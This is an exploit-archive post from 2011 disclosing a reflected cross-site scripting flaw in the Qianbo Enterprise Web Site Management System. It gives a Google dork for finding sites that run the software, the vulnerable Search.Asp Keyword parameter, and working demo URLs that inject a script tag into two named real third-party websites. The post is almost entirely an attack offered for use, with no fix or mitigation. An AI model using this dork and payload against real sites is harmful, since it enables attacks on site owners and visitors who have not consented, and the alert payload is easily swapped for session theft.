Home / exploitsPDF  

Qianbo Enterprise Web Site Management System Cross Site Scri

Posted on 14 April 2011

########################################################################################## # [+] cross site scripting (XSS) Vulnerability # [+] Portal Name : qianbo # [+] software : http://www.qianbo.com.cn # [+] Author : d3c0der # [+] Contact : d3c0der@hotmail.com # [+] Google dork : Web Site Technology Framework$B!'(BQianbo Enterprise Web Site Management System Copyright #[------------------------------------------------------------------------------------] # # [+] Vulnerability # # [+] XSS # # http://www.[site]/en/Search.Asp?Range=Product&Keyword=[xss] # # #[------------------------------------------------------------------------------------] # [+] Demo # #http://www.toyfactory.cn/en/Search.Asp?Range=Product&Keyword=<script>alert("d3c0der")</script> #http://www.tci-tw.com/en/Search.Asp?Range=Product&Keyword=<script>alert("d3c0der")</script> # ##########################################################################################

 

TOP